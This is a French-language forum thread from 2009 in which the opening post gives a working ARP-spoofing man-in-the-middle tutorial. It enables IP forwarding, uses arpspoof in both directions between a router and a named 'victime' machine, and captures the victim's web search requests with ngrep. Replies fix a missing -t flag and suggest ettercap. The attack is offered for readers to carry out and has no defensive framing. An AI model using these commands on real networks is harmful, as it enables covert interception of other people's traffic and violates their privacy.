[sniffing] local network...

#1 (**permalink**) 06-27-2009, 03:00 PM

bonjour,
tous dabort ce que nous devons savoir pour y arriver.

Notre passerelle/router ADSL est 192.168.0.1 (peut être aussi 192.168.1.1).

Notre machine victime est 192.168.0.84

Notre machine sniffeuse est 192.168.0.56

Ensuite il faut activer le forwarding Ipv4.

Code:

echo 1 >  /proc/sys/net/ipv4/ip_forward

ou

Code:

sysctl -w net.ipv4.ip_forward

(la premiere fonctionne trés bien sous backtrack, la seconde je ne sais pas.)

Ensuite il faut ouvrir plusieurs consoles.

la premiere pour faire croire à 192.168.0.1 que nous possedons l'interface de 192.168.0.84

Code:

arpspoof -i eth0 -t 192.168.0.1 192.168.0.84

la seconde pour faire croire à 192.168.0.84 que nous sommes 192.168.0.1

Code:

arpspoof -i eth0 -t 192.168.0.84 192.168.0.1

La troisième pour écouter le traffic contenant la chaine "GET /shearch" avec ngerp :

Code:

ngrep "GET /shearch" "host 192.168.0.84"

le résulta vous affichera la bonne marche des choses.

NOTEZ que arpspoof est ici utilisé avec l'option -t, cela vise une seule machine (donc 192.168.0.84), sans cette option toutes les machines sont visées.

NOTEZ également que ce que nous venons de faire avec arpspoof et ngrep peut être fait en une seule commande avec ettercap qui est certe moins polyvalente.

Cet article est pris dans un magazine appellé "LINUX-Hors série" que je vous conseille.

Voila je vous remerçi de me poster le résultat de vos test de ce tutorial...
par avance merci

R34ld3rkgf · #2 (**permalink**) 06-29-2009, 06:45 PM

Salut HKdone,

Sa m'as l'air d'etre un bon tuto ton post, mais moi j'ai un petit souci avec la 2eme command : # arpspoof -i ath0 192.168.1.1 192.168.1.2 (avec les IPs et interface de mon reseau) et j'obtiens sa :
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host

je rajoute donc l'option -t avant IP du routeur et là j'ai cette reponse :
arpspoof: couldn't arp for host 192.168.1.1

Je me pose donc des questions. Avec ettercap-gui, sa marche sans probleme.

A titre d'info j'utilise bt3f sur Eeepc-900.
Mon reseau :
Routeur :192.168.1.1
Victime :192.168.1.2
Sniff : 192.168.1.3

Jvais continuer de chercher, pour voir ce qui foire.

#3 (**permalink**) 06-30-2009, 06:50 AM

bonjour
dsl j'avais oublier un -t l'erreur est réparée
je croi aussi que tu doit metre eth0 et non ath0...
voila.
=)

XcessiV · #4 (**permalink**) 07-23-2009, 08:24 PM

Cela ressemble plus être un tuto man in the middle, non ?
De plus, il doit y avoir des outils plus sympa pour le sniff de la fin, non ?

KaitoKito · #5 (**permalink**) 09-01-2009, 09:43 PM

Merci du tuyau

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode